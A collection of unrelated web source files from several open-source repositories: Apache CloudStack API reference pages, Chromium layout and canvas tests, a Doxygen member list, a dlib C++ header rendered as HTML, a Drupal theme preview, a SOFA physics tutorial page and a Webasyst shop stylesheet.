</tr>
<tr>
<td style="width:200px;"><strong>fingerprint</strong></td><td style="width:500px;">Fingerprint of the public key</td>
</tr>
<tr>
<td style="width:200px;"><strong>name</strong></td><td style="width:500px;">Name of the keypair</td>
</tr>
</table>
</div>
</div>
</div>
</div>
</div>
<div id="footer">
<div id="comments_thread">
<script type="text/javascript" src="https://comments.apache.org/show_comments.lua?site=test" async="true"></script>
<noscript>
<iframe width="930" height="500" src="https://comments.apache.org/iframe.lua?site=test&page=4.2.0/rootadmin"></iframe>
</noscript>
</div>
<div id="footer_mainmaster">
<p>Copyright © 2015 The Apache Software Foundation, Licensed under the
<a href="http://www.apache.org/licenses/LICENSE-2.0">Apache License, Version 2.0.</a>
<br>
Apache, CloudStack, Apache CloudStack, the Apache CloudStack logo, the CloudMonkey logo and the Apache feather logo are trademarks of The Apache Software Foundation.</p>
</div>
</div>
</div>
</div>
</body>
</html>
|
source/api/apidocs-4.4/user/createInstanceGroup.html
|
resmo/cloudstack-www
|
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 1.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="../includes/main.css" type="text/css">
<link rel="shortcut icon" href="../favicon.ico" type="image/x-icon">
<title>Apache CloudStack | The Power Behind Your Cloud</title>
</head>
<body>
<div id="insidetopbg">
<div id="inside_wrapper">
<div class="uppermenu_panel">
<div class="uppermenu_box"></div>
</div>
<div id="main_master">
<div id="inside_header">
<div class="header_top">
<a class="cloud_logo" href="http://cloudstack.org"></a>
<div class="mainemenu_panel"></div>
</div>
</div>
<div id="main_content">
<div class="inside_apileftpanel">
<div class="inside_contentpanel" style="width:930px;">
<div class="api_titlebox">
<div class="api_titlebox_left">
<span>
Apache CloudStack v4.4.1 User API Reference
</span>
<p></p>
<h1>createInstanceGroup</h1>
<p>Creates a vm group</p>
</div>
<div class="api_titlebox_right">
<a class="api_backbutton" href="../TOC_User.html"></a>
</div>
</div>
<div class="api_tablepanel">
<h2>Request parameters</h2>
<table class="apitable">
<tr class="hed">
<td style="width:200px;"><strong>Parameter Name</strong></td><td style="width:500px;">Description</td><td style="width:180px;">Required</td>
</tr>
<tr>
<td style="width:200px;"><strong>name</strong></td><td style="width:500px;"><strong>the name of the instance group</strong></td><td style="width:180px;"><strong>true</strong></td>
</tr>
<tr>
<td style="width:200px;"><i>account</i></td><td style="width:500px;"><i>the account of the instance group. The account parameter must be used with the domainId parameter.</i></td><td style="width:180px;"><i>false</i></td>
</tr>
<tr>
<td style="width:200px;"><i>domainid</i></td><td style="width:500px;"><i>the domain ID of account owning the instance group</i></td><td style="width:180px;"><i>false</i></td>
</tr>
<tr>
<td style="width:200px;"><i>projectid</i></td><td style="width:500px;"><i>The project of the instance group</i></td><td style="width:180px;"><i>false</i></td>
</tr>
</table>
</div>
<div class="api_tablepanel">
<h2>Response Tags</h2>
<table class="apitable">
<tr class="hed">
<td style="width:200px;"><strong>Response Name</strong></td><td style="width:500px;">Description</td>
</tr>
<tr>
<td style="width:200px;"><strong>id</strong></td><td style="width:500px;">the id of the instance group</td>
</tr>
<tr>
<td style="width:200px;"><strong>account</strong></td><td style="width:500px;">the account owning the instance group</td>
</tr>
<tr>
<td style="width:200px;"><strong>created</strong></td><td style="width:500px;">time and date the instance group was created</td>
</tr>
<tr>
<td style="width:200px;"><strong>domain</strong></td><td style="width:500px;">the domain name of the instance group</td>
</tr>
<tr>
<td style="width:200px;"><strong>domainid</strong></td><td style="width:500px;">the domain ID of the instance group</td>
</tr>
<tr>
<td style="width:200px;"><strong>name</strong></td><td style="width:500px;">the name of the instance group</td>
</tr>
<tr>
<td style="width:200px;"><strong>project</strong></td><td style="width:500px;">the project name of the group</td>
</tr>
<tr>
<td style="width:200px;"><strong>projectid</strong></td><td style="width:500px;">the project id of the group</td>
</tr>
</table>
</div>
</div>
</div>
</div>
</div>
<div id="footer">
<div id="footer_mainmaster">
<p>Copyright © 2014 The Apache Software Foundation, Licensed under the
<a href="http://www.apache.org/licenses/LICENSE-2.0">Apache License, Version 2.0.</a>
<br>
Apache, CloudStack, Apache CloudStack, the Apache CloudStack logo, the CloudMonkey logo and the Apache feather logo are trademarks of The Apache Software Foundation.</p>
</div>
</div>
</div>
</div>
</body>
</html>
|
third_party/blink/web_tests/external/wpt/css/css-multicol/crashtests/nested-with-tall-padding-and-oof.html
|
chromium/chromium
|
<!DOCTYPE html>
<link rel="author" title="Morten Stenshorne" href="mailto:mstensho@chromium.org">
<link rel="help" href="https://bugs.chromium.org/p/chromium/issues/detail?id=1295998">
<div id="outer" style="columns:2; column-fill:auto; height:50px;">
<div id="inner" style="columns:2; padding-top:51px; column-fill:auto; height:1px;">
<div style="position:absolute;"></div>
</div>
</div>
|
third_party/blink/web_tests/external/wpt/html/canvas/offscreen/shadows/2d.shadow.outside.html
|
scheib/chromium
|
<!DOCTYPE html>
<!-- DO NOT EDIT! This test has been generated by /html/canvas/tools/gentest.py. -->
<title>OffscreenCanvas test: 2d.shadow.outside</title>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<script src="/html/canvas/resources/canvas-tests.js"></script>
<h1>2d.shadow.outside</h1>
<p class="desc">Shadows of shapes outside the visible area can be offset onto the visible area</p>
<script>
var t = async_test("Shadows of shapes outside the visible area can be offset onto the visible area");
var t_pass = t.done.bind(t);
var t_fail = t.step_func(function(reason) {
throw reason;
});
t.step(function() {
var offscreenCanvas = new OffscreenCanvas(100, 50);
var ctx = offscreenCanvas.getContext('2d');
ctx.fillStyle = '#f00';
ctx.fillRect(0, 0, 100, 50);
ctx.shadowColor = '#0f0';
ctx.shadowOffsetX = 100;
ctx.fillRect(-100, 0, 25, 50);
ctx.shadowOffsetX = -100;
ctx.fillRect(175, 0, 25, 50);
ctx.shadowOffsetX = 0;
ctx.shadowOffsetY = 100;
ctx.fillRect(25, -100, 50, 25);
ctx.shadowOffsetY = -100;
ctx.fillRect(25, 125, 50, 25);
_assertPixel(offscreenCanvas, 12,25, 0,255,0,255, "12,25", "0,255,0,255");
_assertPixel(offscreenCanvas, 87,25, 0,255,0,255, "87,25", "0,255,0,255");
_assertPixel(offscreenCanvas, 50,12, 0,255,0,255, "50,12", "0,255,0,255");
_assertPixel(offscreenCanvas, 50,37, 0,255,0,255, "50,37", "0,255,0,255");
t.done();
});
</script>
|
documentation/struct_tibia_1_1_objects_1_1_client_path_info-members.html
|
gareox/tibiaapi
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<title>TibiaAPI: Member List</title>
<link href="tabs.css" rel="stylesheet" type="text/css">
<link href="doxygen.css" rel="stylesheet" type="text/css">
</head><body>
<!-- Generated by Doxygen 1.5.9 -->
<script type="text/javascript">
<!--
function changeDisplayState (e){
var num=this.id.replace(/[^[0-9]/g,'');
var button=this.firstChild;
var sectionDiv=document.getElementById('dynsection'+num);
if (sectionDiv.style.display=='none'||sectionDiv.style.display==''){
sectionDiv.style.display='block';
button.src='open.gif';
}else{
sectionDiv.style.display='none';
button.src='closed.gif';
}
}
function initDynSections(){
var divs=document.getElementsByTagName('div');
var sectionCounter=1;
for(var i=0;i<divs.length-1;i++){
if(divs[i].className=='dynheader'&&divs[i+1].className=='dynsection'){
var header=divs[i];
var section=divs[i+1];
var button=header.firstChild;
if (button!='IMG'){
divs[i].insertBefore(document.createTextNode(' '),divs[i].firstChild);
button=document.createElement('img');
divs[i].insertBefore(button,divs[i].firstChild);
}
header.style.cursor='pointer';
header.onclick=changeDisplayState;
header.id='dynheader'+sectionCounter;
button.src='closed.gif';
section.id='dynsection'+sectionCounter;
section.style.display='none';
section.style.marginLeft='14px';
sectionCounter++;
}
}
}
window.onload = initDynSections;
-->
</script>
<div class="navigation" id="top">
<div class="tabs">
<ul>
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="namespaces.html"><span>Packages</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
</ul>
</div>
<div class="tabs">
<ul>
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="hierarchy.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
</div>
<div class="contents">
<h1>Tibia.Objects.ClientPathInfo Member List</h1>This is the complete list of members for <a class="el" href="struct_tibia_1_1_objects_1_1_client_path_info.html">Tibia.Objects.ClientPathInfo</a>, including all inherited members.<p><table>
<tr class="memlist"><td><a class="el" href="struct_tibia_1_1_objects_1_1_client_path_info.html#4a1e325e8bcd6e305764070535b6b330">ClientPathInfo</a>(string path, string version)</td><td><a class="el" href="struct_tibia_1_1_objects_1_1_client_path_info.html">Tibia.Objects.ClientPathInfo</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="struct_tibia_1_1_objects_1_1_client_path_info.html#9b93a6829b99a434114c874c34777d91">Path</a></td><td><a class="el" href="struct_tibia_1_1_objects_1_1_client_path_info.html">Tibia.Objects.ClientPathInfo</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="struct_tibia_1_1_objects_1_1_client_path_info.html#a38b7bc7ea20319873a94c10a2e27515">ToString</a>()</td><td><a class="el" href="struct_tibia_1_1_objects_1_1_client_path_info.html">Tibia.Objects.ClientPathInfo</a></td><td></td></tr>
<tr class="memlist"><td><a class="el" href="struct_tibia_1_1_objects_1_1_client_path_info.html#f5212a85fc1549cbc6316e2394c8a39f">Version</a></td><td><a class="el" href="struct_tibia_1_1_objects_1_1_client_path_info.html">Tibia.Objects.ClientPathInfo</a></td><td></td></tr>
</table></div>
<hr size="1"><address style="text-align: right;"><small>Generated on Tue Jul 7 18:50:10 2009 for TibiaAPI by
<a href="http://www.doxygen.org/index.html">
<img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.5.9 </small></address>
</body>
</html>
|
sample_app/app/js/main/templates/about.tpl.html
|
nolazybits/ui-router-addons
|
<p>This is about</p>
|
include/dlib-18.9/docs/dlib/smart_pointers/scoped_ptr.h.html
|
eldilibra/mudsling
|
<html><!-- Created using the cpp_pretty_printer from the dlib C++ library. See http://dlib.net for updates. --><head><title>dlib C++ Library - scoped_ptr.h</title></head><body bgcolor='white'><pre>
<font color='#009900'>// Copyright (C) 2007 Davis E. King (davis@dlib.net)
</font><font color='#009900'>// License: Boost Software License See LICENSE.txt for the full license.
</font><font color='#0000FF'>#ifndef</font> DLIB_SCOPED_PTr_
<font color='#0000FF'>#define</font> DLIB_SCOPED_PTr_
<font color='#0000FF'>#include</font> <font color='#5555FF'><</font>algorithm<font color='#5555FF'>></font>
<font color='#0000FF'>#include</font> "<a style='text-decoration:none' href='../noncopyable.h.html'>../noncopyable.h</a>"
<font color='#0000FF'>#include</font> "<a style='text-decoration:none' href='../algs.h.html'>../algs.h</a>"
<font color='#0000FF'>#include</font> "<a style='text-decoration:none' href='scoped_ptr_abstract.h.html'>scoped_ptr_abstract.h</a>"
<font color='#0000FF'>namespace</font> dlib
<b>{</b>
<font color='#009900'>// ----------------------------------------------------------------------------------------
</font>
<font color='#0000FF'>template</font> <font color='#5555FF'><</font><font color='#0000FF'>typename</font> T<font color='#5555FF'>></font>
<font color='#0000FF'>struct</font> <b><a name='default_deleter'></a>default_deleter</b>
<b>{</b>
<font color='#0000FF'><u>void</u></font> <b><a name='operator'></a>operator</b><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font> <font face='Lucida Console'>(</font>T<font color='#5555FF'>*</font> item<font face='Lucida Console'>)</font> <font color='#0000FF'>const</font>
<b>{</b>
<font color='#0000FF'>delete</font> item;
<b>}</b>
<b>}</b>;
<font color='#0000FF'>template</font> <font color='#5555FF'><</font><font color='#0000FF'>typename</font> T<font color='#5555FF'>></font>
<font color='#0000FF'>struct</font> <b><a name='default_deleter'></a>default_deleter</b><font color='#5555FF'><</font>T[]<font color='#5555FF'>></font>
<b>{</b>
<font color='#0000FF'><u>void</u></font> <b><a name='operator'></a>operator</b><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font> <font face='Lucida Console'>(</font>T<font color='#5555FF'>*</font> item<font face='Lucida Console'>)</font> <font color='#0000FF'>const</font>
<b>{</b>
<font color='#0000FF'>delete</font> [] item;
<b>}</b>
<b>}</b>;
<font color='#009900'>// ----------------------------------------------------------------------------------------
</font>
<font color='#0000FF'>template</font> <font color='#5555FF'><</font>
<font color='#0000FF'>typename</font> T,
<font color='#0000FF'>typename</font> deleter <font color='#5555FF'>=</font> default_deleter<font color='#5555FF'><</font>T<font color='#5555FF'>></font>
<font color='#5555FF'>></font>
<font color='#0000FF'>class</font> <b><a name='scoped_ptr'></a>scoped_ptr</b> : noncopyable
<b>{</b>
<font color='#009900'>/*!
CONVENTION
- get() == ptr
!*/</font>
<font color='#0000FF'>public</font>:
<font color='#0000FF'>typedef</font> T element_type;
<font color='#0000FF'>typedef</font> deleter deleter_type;
<font color='#0000FF'>explicit</font> <b><a name='scoped_ptr'></a>scoped_ptr</b> <font face='Lucida Console'>(</font>
T<font color='#5555FF'>*</font> p <font color='#5555FF'>=</font> <font color='#979000'>0</font>
<font face='Lucida Console'>)</font> : ptr<font face='Lucida Console'>(</font>p<font face='Lucida Console'>)</font> <b>{</b> <b>}</b>
~<b><a name='scoped_ptr'></a>scoped_ptr</b><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font>
<b>{</b>
<font color='#0000FF'>if</font> <font face='Lucida Console'>(</font>ptr<font face='Lucida Console'>)</font>
<b>{</b>
deleter del;
<font color='#BB00BB'>del</font><font face='Lucida Console'>(</font>ptr<font face='Lucida Console'>)</font>;
<b>}</b>
<b>}</b>
<font color='#0000FF'><u>void</u></font> <b><a name='reset'></a>reset</b> <font face='Lucida Console'>(</font>
T<font color='#5555FF'>*</font> p <font color='#5555FF'>=</font> <font color='#979000'>0</font>
<font face='Lucida Console'>)</font>
<b>{</b>
<font color='#0000FF'>if</font> <font face='Lucida Console'>(</font>ptr<font face='Lucida Console'>)</font>
<b>{</b>
deleter del;
<font color='#BB00BB'>del</font><font face='Lucida Console'>(</font>ptr<font face='Lucida Console'>)</font>;
<b>}</b>
ptr <font color='#5555FF'>=</font> p;
<b>}</b>
T<font color='#5555FF'>&</font> <b><a name='operator'></a>operator</b><font color='#5555FF'>*</font><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font> <font color='#0000FF'>const</font>
<b>{</b>
<font color='#BB00BB'>DLIB_ASSERT</font><font face='Lucida Console'>(</font><font color='#BB00BB'>get</font><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font> <font color='#5555FF'>!</font><font color='#5555FF'>=</font> <font color='#979000'>0</font>,
"<font color='#CC0000'>\tscoped_ptr::operator*()</font>"
<font color='#5555FF'><</font><font color='#5555FF'><</font> "<font color='#CC0000'>\n\tget() can't be null if you are going to dereference it</font>"
<font color='#5555FF'><</font><font color='#5555FF'><</font> "<font color='#CC0000'>\n\tthis: </font>" <font color='#5555FF'><</font><font color='#5555FF'><</font> <font color='#0000FF'>this</font>
<font face='Lucida Console'>)</font>;
<font color='#0000FF'>return</font> <font color='#5555FF'>*</font>ptr;
<b>}</b>
T<font color='#5555FF'>*</font> <b><a name='operator'></a>operator</b><font color='#5555FF'>-</font><font color='#5555FF'>></font><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font> <font color='#0000FF'>const</font>
<b>{</b>
<font color='#BB00BB'>DLIB_ASSERT</font><font face='Lucida Console'>(</font><font color='#BB00BB'>get</font><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font> <font color='#5555FF'>!</font><font color='#5555FF'>=</font> <font color='#979000'>0</font>,
"<font color='#CC0000'>\tscoped_ptr::operator*()</font>"
<font color='#5555FF'><</font><font color='#5555FF'><</font> "<font color='#CC0000'>\n\tget() can't be null</font>"
<font color='#5555FF'><</font><font color='#5555FF'><</font> "<font color='#CC0000'>\n\tthis: </font>" <font color='#5555FF'><</font><font color='#5555FF'><</font> <font color='#0000FF'>this</font>
<font face='Lucida Console'>)</font>;
<font color='#0000FF'>return</font> ptr;
<b>}</b>
T<font color='#5555FF'>*</font> <b><a name='get'></a>get</b><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font> <font color='#0000FF'>const</font>
<b>{</b>
<font color='#0000FF'>return</font> ptr;
<b>}</b>
<b><a name='operator'></a>operator</b> <font color='#0000FF'><u>bool</u></font><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font> <font color='#0000FF'>const</font>
<b>{</b>
<font color='#0000FF'>return</font> <font face='Lucida Console'>(</font>ptr <font color='#5555FF'>!</font><font color='#5555FF'>=</font> <font color='#979000'>0</font><font face='Lucida Console'>)</font>;
<b>}</b>
<font color='#0000FF'><u>void</u></font> <b><a name='swap'></a>swap</b><font face='Lucida Console'>(</font>
scoped_ptr<font color='#5555FF'>&</font> b
<font face='Lucida Console'>)</font>
<b>{</b>
std::<font color='#BB00BB'>swap</font><font face='Lucida Console'>(</font>ptr,b.ptr<font face='Lucida Console'>)</font>;
<b>}</b>
<font color='#0000FF'>private</font>:
T<font color='#5555FF'>*</font> ptr;
<b>}</b>;
<font color='#009900'>// ----------------------------------------------------------------------------------------
</font>
<font color='#0000FF'>template</font> <font color='#5555FF'><</font>
<font color='#0000FF'>typename</font> T,
<font color='#0000FF'>typename</font> deleter
<font color='#5555FF'>></font>
<font color='#0000FF'>class</font> <b><a name='scoped_ptr'></a>scoped_ptr</b><font color='#5555FF'><</font>T[],deleter<font color='#5555FF'>></font> : noncopyable
<b>{</b>
<font color='#009900'>/*!
CONVENTION
- get() == ptr
!*/</font>
<font color='#0000FF'>public</font>:
<font color='#0000FF'>typedef</font> T element_type;
<font color='#0000FF'>explicit</font> <b><a name='scoped_ptr'></a>scoped_ptr</b> <font face='Lucida Console'>(</font>
T<font color='#5555FF'>*</font> p <font color='#5555FF'>=</font> <font color='#979000'>0</font>
<font face='Lucida Console'>)</font> : ptr<font face='Lucida Console'>(</font>p<font face='Lucida Console'>)</font> <b>{</b> <b>}</b>
~<b><a name='scoped_ptr'></a>scoped_ptr</b><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font>
<b>{</b>
<font color='#0000FF'>if</font> <font face='Lucida Console'>(</font>ptr<font face='Lucida Console'>)</font>
<b>{</b>
deleter del;
<font color='#BB00BB'>del</font><font face='Lucida Console'>(</font>ptr<font face='Lucida Console'>)</font>;
<b>}</b>
<b>}</b>
<font color='#0000FF'><u>void</u></font> <b><a name='reset'></a>reset</b> <font face='Lucida Console'>(</font>
T<font color='#5555FF'>*</font> p <font color='#5555FF'>=</font> <font color='#979000'>0</font>
<font face='Lucida Console'>)</font>
<b>{</b>
<font color='#0000FF'>if</font> <font face='Lucida Console'>(</font>ptr<font face='Lucida Console'>)</font>
<b>{</b>
deleter del;
<font color='#BB00BB'>del</font><font face='Lucida Console'>(</font>ptr<font face='Lucida Console'>)</font>;
<b>}</b>
ptr <font color='#5555FF'>=</font> p;
<b>}</b>
T<font color='#5555FF'>&</font> <b><a name='operator'></a>operator</b>[] <font face='Lucida Console'>(</font>
<font color='#0000FF'><u>unsigned</u></font> <font color='#0000FF'><u>long</u></font> idx
<font face='Lucida Console'>)</font> <font color='#0000FF'>const</font>
<b>{</b>
<font color='#BB00BB'>DLIB_ASSERT</font><font face='Lucida Console'>(</font><font color='#BB00BB'>get</font><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font> <font color='#5555FF'>!</font><font color='#5555FF'>=</font> <font color='#979000'>0</font>,
"<font color='#CC0000'>\tscoped_ptr::operator[]()</font>"
<font color='#5555FF'><</font><font color='#5555FF'><</font> "<font color='#CC0000'>\n\tget() can't be null if you are going to dereference it</font>"
<font color='#5555FF'><</font><font color='#5555FF'><</font> "<font color='#CC0000'>\n\tthis: </font>" <font color='#5555FF'><</font><font color='#5555FF'><</font> <font color='#0000FF'>this</font>
<font face='Lucida Console'>)</font>;
<font color='#0000FF'>return</font> ptr[idx];
<b>}</b>
T<font color='#5555FF'>*</font> <b><a name='get'></a>get</b><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font> <font color='#0000FF'>const</font>
<b>{</b>
<font color='#0000FF'>return</font> ptr;
<b>}</b>
<b><a name='operator'></a>operator</b> <font color='#0000FF'><u>bool</u></font><font face='Lucida Console'>(</font><font face='Lucida Console'>)</font> <font color='#0000FF'>const</font>
<b>{</b>
<font color='#0000FF'>return</font> <font face='Lucida Console'>(</font>ptr <font color='#5555FF'>!</font><font color='#5555FF'>=</font> <font color='#979000'>0</font><font face='Lucida Console'>)</font>;
<b>}</b>
<font color='#0000FF'><u>void</u></font> <b><a name='swap'></a>swap</b><font face='Lucida Console'>(</font>
scoped_ptr<font color='#5555FF'>&</font> b
<font face='Lucida Console'>)</font>
<b>{</b>
std::<font color='#BB00BB'>swap</font><font face='Lucida Console'>(</font>ptr,b.ptr<font face='Lucida Console'>)</font>;
<b>}</b>
<font color='#0000FF'>private</font>:
T<font color='#5555FF'>*</font> ptr;
<b>}</b>;
<font color='#009900'>// ----------------------------------------------------------------------------------------
</font>
<font color='#0000FF'>template</font> <font color='#5555FF'><</font>
<font color='#0000FF'>typename</font> T,
<font color='#0000FF'>typename</font> deleter
<font color='#5555FF'>></font>
<font color='#0000FF'><u>void</u></font> <b><a name='swap'></a>swap</b><font face='Lucida Console'>(</font>
scoped_ptr<font color='#5555FF'><</font>T,deleter<font color='#5555FF'>></font><font color='#5555FF'>&</font> a,
scoped_ptr<font color='#5555FF'><</font>T,deleter<font color='#5555FF'>></font><font color='#5555FF'>&</font> b
<font face='Lucida Console'>)</font>
<b>{</b>
a.<font color='#BB00BB'>swap</font><font face='Lucida Console'>(</font>b<font face='Lucida Console'>)</font>;
<b>}</b>
<font color='#009900'>// ----------------------------------------------------------------------------------------
</font>
<b>}</b>
<font color='#0000FF'>#endif</font> <font color='#009900'>// DLIB_SCOPED_PTr_
</font>
</pre></body></html>
|
sites/default/themes/toronto/color/preview.html
|
lueimg/f4k16
|
<div id="preview">
<div id="preview-header">
<div id="preview-logo"><img src="../../../themes/beta/logo.png" alt="Site Logo" /></div>
<div id="preview-site-name"><a>Site Title - Beta</a></div>
<div id="preview-site-slogan">An awesome site slogan about the stuff we do...</div>
</div>
<div id="preview-horizontal-grad">
<div id="preview-main-menu">
<ul id="preview-main-menu-links">
<li><a>Home</a></li>
<li><a class="active">Menu Item 1</a></li>
<li><a>Menu Item 2</a></li>
</ul>
<div id="preview-secondary-menu">
<ul id="preview-secondary-menu-links">
<li><a class="active">Sub Item 1</a></li>
<li><a>Sub Item 2</a></li>
<li><a>Sub Item 3</a></li>
</ul>
</div>
</div>
<div id="preview-main" class="clearfix">
<div id="preview-sidebar">
<div id="preview-block" class="preview-block">
<h2>Etiam est risus</h2>
<div class="preview-content">
Maecenas id porttitor Ut enim ad minim veniam, quis nostrudfelis.
Laboris nisi ut aliquip ex ea.
</div>
</div>
</div>
<div id="preview-content">
<h1 id="preview-page-title">Lorem ipsum dolor</h1>
<div id="preview-node">
<div class="preview-content">
Sit amet, <a>consectetur adipisicing elit</a>, sed do eiusmod tempor
incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis
nostrud <a>exercitation ullamco</a> laboris nisi ut aliquip ex ea
commodo consequat. Maecenas id porttitor Ut enim ad minim veniam, quis nostr udfelis.
</div>
</div>
</div>
</div>
</div>
<div id="preview-footer-wrapper">
<div id="preview-footer-columns" class="clearfix">
<div class="preview-footer-column">
<div class="preview-block">
<h2>Etiam est risus</h2>
<div class="content">
Maecenas id porttitor Ut enim ad minim veniam, quis nostrudfelis.
Laboris nisi ut aliquip ex ea.
</div>
</div>
</div>
<div class="preview-footer-column">
<div class="preview-block preview-block-menu">
<h2>Erisus dolor</h2>
<div class="preview-content">
<ul>
<li><a>Donec placerat</a></li>
<li><a>Nullam nibh dolor</a></li>
<li><a>Blandit sed</a></li>
<li><a>Fermentum id</a></li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
|
examples/Tutorials/StepByStep/Pendulum/1_Pendulum.html
|
FabienPean/sofa
|
<html>
<head>
<link href="../../../Objects/sofa_white.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="contenu">
<center><h3>Creation of a Pendulum (2/8)</h3></center>
<div id="orangeText">Description</div>
<p>In the previous scene, no solver was present, so no simulation was done. In this step, we will add an <strong>ODE solver</strong> in the Root node of the simulation. We provide several ODE solvers, with different integration schemes. Take a look at our tutorials on Solvers later.</p>
<div id="orangeText">Key points</div>
<p>We will use the classic explicit euler solver <strong>EulerSolver</strong> to update particle positions and velocities at each time step. In SOFA, a solver acts on all the object placed below in the hierarchy. </p>
<p><div id="tutorialAction">In the Modeler's <strong>Filter</strong> textbox, type "Euler". Click and drag the EulerSolver component over the <strong>root</strong> node. Press the <strong>Run in SOFA</strong> button. Press <strong>Animate</strong>.</div></p>
<br><div id="orangeText">Results</div>
<p> This time, when you animate the scene, the particule falls along the direction of the gravity.<br>
The gravity is specified in the root node of the simulation. We use a default value of (0, 0, -9.81).</p>
<p><div id="tutorialAction">In the Modeler scene graph, double click the root node.</div></p>
<p>This opens the components for this node, and allows you to edit them. We won't make any changes for now.</p>
<p><div id="tutorialAction"> Press <strong>OK</strong> to return to the Modeler window. </div></p>
<p>Changing the gravity on child nodes of the simulation will not do anything as at each time step the gravity, and other parameters, (time, dt...) is overwritten using the value specified in the root node.<br>
The component Gravity lets you specify a particular gravity for a node and all its children.</p>
<p><div id="tutorialAction"> To see an example of this, type "Gravity" into the <strong>Filter</strong> textbox in the Modeler. Click on the <strong>Gravity</strong> component. In the top right section of the window, a description of the component will appear, with links to examples. Click on the links to open the example scene in the Modeler. When you are done, close the <strong>Gravity.scn</strong> tab to return to the tutorial scene. </div> </p>
<br><center><h3><a href="0_Pendulum.scn">Previous</a> ____________ <a href="2_Pendulum.scn">Next</a></center></h3>
</div>
</body>
</html>
|
wa-data/public/shop/themes/old/custom.shop.css
|
dmitriyzhdankin/fonaricmarket
|
/*
* Webasyst CUSTOM theme family
*
* Shop-Script app CSS
* (requires linking base custom.css file from the Site app)
*
* @link http://www.webasyst.com/
* @author Webasyst LLC
* @copyright 2013 Webasyst LLC
* @package Webasyst
*/
/* Misc layout and elements */
.sidebar { padding-top: 44px; }
.sidebar.left300px { width: 270px; float: left; }
.content.left300px { margin-left: 300px; }
.sidebar.right300px { width: 270px; float: right; }
.content.right300px { margin-right: 300px; }
.sidebar p { line-height: 1.3em; }
.breadcrumbs { padding: 5px 0 20px; }
div.cart { background: #ceb; box-shadow: 0 -2px 9px -5px rgba(0,0,0,0.3); width: 240px; padding: 15px 15px 15px; }
div.cart.fixed { overflow: hidden; position: fixed; top: 70px; z-index: 1312; box-shadow: 0 -2px 10px -5px rgba(0, 0, 0, 0.7) !important; }
div.cart.fixed a { }
.search { padding: 10px 0 20px; }
.search input { font-size: 16px; width: 80%; }
.currency-toggle { position: absolute; right: 165px; padding-top: 55px; } /* pulled-out currency selector */
.bonus { background: #ceb; padding: 2px 4px 1px; }
.plugin { margin-bottom: 20px; } /* shipping and payment plugins ouput */
/* Homepage */
.promo { padding: 0; overflow: hidden; background: #fff; border-top: 1px solid #ccc; border-bottom: 1px solid #ccc; }
.promo a { display: block; height: 500px; position: relative; }
.promo a .image { position: absolute; right: 0; left: 0; top: 0; bottom: 0; }
.promo a .image .corner.right { right: 30px; }
.promo a .image .corner.top { top: 30px; }
.promo a .image img { width: 100%; top: -30%; position: absolute; }
.promo a .info { position: absolute; top: 10px; left: 30px; max-width: 60%; }
.promo a .info h2 { font-size: 3em; font-weight: bold; color: #000; line-height: 1.5em; margin-bottom: 0; text-shadow: 0 0 9px #fff; }
.promo a .info p { color: #555; font-size: 1.3em; text-shadow: 0 0 3px #fff; }
.promo .bx-wrapper { margin: 0 auto; }
.promo .bx-wrapper .bx-viewport { border: none; box-shadow: none; left: 0; }
.promo .bx-wrapper .bx-pager,
.promo .bx-wrapper .bx-controls-auto { bottom: 20px; }
.promo .bx-wrapper .bx-controls-direction a { display: none; opacity: 0.7; }
.promo:hover .bx-wrapper .bx-controls-direction a { display: block; }
/* Category */
.sub-categories { margin-bottom: 20px; }
.filters { background: #eed; width: 240px; padding: 15px; float: right; }
.filters input[type="text"] { font-size: 0.9em; width: 50px; text-align: right; }
/* Product info and lists */
.tags a { color: green; }
.tags.cloud { text-align: center; font-size: 0.9em; padding-top: 20px; margin-top: 30px; border-top: 1px solid #ccc; }
ul.skus { padding-left: 0; }
ul.skus li { list-style: none; }
.stocks { margin-top: 10px; margin-bottom: 15px; font-size: 0.9em; }
.stocks .stock-critical { color: #e00; }
.stocks .stock-low { color: #a80; }
.stocks .stock-high { color: #0a0; }
.stocks .stock-none { color: #aaa; }
.stocks .icon16 { margin-top: 0.05em; }
ul.menu-h.sorting { margin-left: 0; }
ul.menu-h.sorting li { padding-right: 5px; }
i.sort-desc { height: 0; width: 0; border: 4px solid transparent; border-bottom-color: #000; margin-bottom: 0.2em; display: inline-block; display: block\9; float: left\9; }
i.sort-asc { height: 0; width: 0; border: 4px solid transparent; border-top-color: #000; margin-top: 0; display: inline-block; display: block\9; float: left\9; }
.price { color: #a00; font-weight: bold; }
.compare-at-price { text-decoration: line-through; color: #c66; margin: 0 3px; }
.out-of-stock { color: #a77; }
.disabled { color: #777; }
.description { margin-bottom: 20px; }
.error { color: #a33; }
.rating i.icon16 { margin-right: 0.13em; }
h1 .rating i.icon16 { margin-top: 0.37em; }
table.compare { width: 100%; }
table.compare td { text-align: center; line-height: 1em; padding: 10px 2px; }
